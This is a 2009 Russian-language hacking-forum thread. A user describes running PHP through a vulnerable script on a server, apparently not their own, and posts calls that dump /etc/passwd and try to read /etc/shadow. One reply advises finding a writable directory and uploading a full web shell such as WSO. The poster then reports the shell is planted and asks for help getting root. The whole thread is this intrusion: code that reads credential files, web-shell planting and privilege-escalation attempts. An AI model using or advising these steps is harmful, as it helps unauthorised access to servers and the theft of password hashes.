Форум АНТИЧАТ - user: root uid:0 gid:0 а shadow не читает ((

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Безопасность (https://forum.antichat.xyz/forumdisplay.php?f=41)

- - user: root uid:0 gid:0 а shadow не читает (( (https://forum.antichat.xyz/showthread.php?t=153758)

_gr34t

04.11.2009 17:42

user: root uid:0 gid:0 а shadow не читает ((

Всем привет!
через уязвимость в скрипте выполняю

PHP код:


		
			
echo "User: ".get_current_user()."uid: ".getmyuid()."gid: ".getmygid();

Результат User: rootuid: 0gid: 0

далее выполняю:

PHP код:


		
			
echo file_get_contents('/etc/passwd');

Результат: файл /etc/passwd

далее выполняю:

PHP код:


		
			
echo file_get_contents('/etc/shadow');

Результат: 0

Почему не удаётся прочитать /etc/shadow? Ведь права рута!

geezer.code

04.11.2009 17:50

1. может быть *BSD (тогда /etc/master.passwd)
2. какое нибудь хитрое chroot
3. еще много вариантов

имхо лучше найти папку на запись, и залить полноценный шелл, например wso.
А там уже будет видно.

diehard

04.11.2009 18:03

вруби для начала error_reporting(E_ALL);

_gr34t

04.11.2009 18:27

geezer.code, привет!
1. Точно Linux
2. Chroot не запущен (вроде)
3. ...
Шелл загрузил, но у него права 30 ( www ) Group: 30 ( www )
И права поменять на рутовые через бажный чкрипт тоже не получается.

diehard, привет. Сейчас попробую

Время: 11:19